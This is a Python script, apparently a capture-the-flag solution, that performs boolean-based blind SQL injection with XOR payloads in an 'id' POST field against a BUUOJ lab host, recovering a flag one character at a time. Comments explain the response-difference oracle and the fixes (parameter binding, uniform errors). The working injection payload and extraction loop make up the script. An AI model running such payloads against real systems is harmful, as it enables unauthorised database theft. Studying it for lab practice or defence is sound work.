利用异或注入
# coding=utf-8
import requests
# Boolean-based blind SQL injection against a lab instance, using XOR (^) in
# the `id` POST field. Each request asks one yes/no question: "is the
# character at this position of flag.flag equal to this candidate?"
# The answer is read from which page the server sends back.
#
# Defensive reading: the side channel is the difference between response
# bodies. Presumably the server places `id` directly into a SQL statement
# (not visible here); binding `id` as a query parameter and validating it as
# an integer removes the injection, and a uniform error response removes the
# oracle.

# Candidate characters, tried in this order for every position.
dic = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,-{}"
url = "http://f1f5f36b-b735-4827-8ff2-1582d26acb7b.node3.buuoj.cn/index.php"
# Marker text that appears in the response for a non-matching guess.
keyword = "Error Occured When Fetch Result"
# Characters recovered so far.
string = ""

for position in range(1, 50):  # positions 1..49, MID() is 1-indexed
    for candidate in dic:
        payload = "1^(SELECT(ASCII(MID((SELECT((flag))FROM(flag)),{0},1))={1}))^1=1".format(position, ord(candidate))
        # NOTE(review): no timeout is passed, so a stalled connection blocks
        # the loop indefinitely.
        response = requests.post(url, data={'id': payload})
        body = response.text
        # Either marker in the body means the guess was wrong.
        # NOTE(review): any other body (for example a proxy error page) is
        # counted as a match, so the output can contain false characters.
        if keyword in body or 'bool(false)' in body:
            continue
        string += candidate
        print(string)
        break
    # If no candidate matched, nothing is appended and the next position is
    # tried anyway.
print("result = " + string)